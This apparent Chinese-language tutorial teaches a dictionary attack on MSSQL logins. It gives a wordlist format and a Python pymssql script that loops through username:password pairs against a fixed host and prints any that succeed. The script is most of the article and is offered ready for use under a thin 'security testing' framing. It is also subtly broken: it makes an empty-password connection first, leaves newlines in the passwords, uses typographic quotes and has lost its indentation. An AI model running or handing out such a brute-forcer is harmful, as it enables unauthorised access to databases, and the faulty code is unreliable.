MSSQL用户名密码破解：超实用字典（mssql用户名密码字典）

攻击

Linux系统的MSSQL用户名密码破解是一种通过构造字典文件，对MSSQL用户名和密码进行破解的安全性测试方法。通过Python脚本，我们可以利用字典攻击来破解Linux系统中MSSQL用户名和密码登录过程。

首先，我们需要构建字典文件，文件名可以是dictionary.txt，用户名和密码分别在文件中。文件中每条信息以换行分割，格式为：

username1:password1

username2:password2

username3:password3

…

构建完字典文件后，使用Python脚本编写一个MSSQL破解的程序。首先我们需要加载的库：

import pymssql

import sys

# 连接地址

ip = ‘192.168.1.1’

# 连接端口

port = ‘1433’

# 数据库名称

db_name = ‘SomeDataBase’

# 开始尝试的用户名

start_name = ‘user1’

# 字典文件

file_name = ‘dictionary.txt’

# 连接到MSSQL数据库

conn = pymssql.connect(ip + ‘:’ + port, user=start_name, password=”, database=db_name)

# 打开字典文件

fp = open(file_name,’r’)

# 从文件中读取每行信息

for line in fp.readlines():

# 将信息用冒号分割成用户名和密码

username, password = line.split(‘:’)

# 使用构建的连接尝试登录

try:

conn = pymssql.connect(ip+’:’+port, user=username, password=password,database=db_name)

#如果登录成功，打印出用户名和密码

print(‘Find a username and password: %s %s’ % (username, password))

# 关闭连接

conn.close()

# 如果登录失败，继续执行

except:

pass

# 关闭文件

fp.close()

通过以上步骤，我们可以通过简单的字典攻击快速搜索Linux系统中MSSQL数据库的用户名和密码，以实现安全测试检查。字典攻击不仅可以测试MSSQL数据库中用户名和密码，也可以用来审查其他系统中用户名密码的安全性。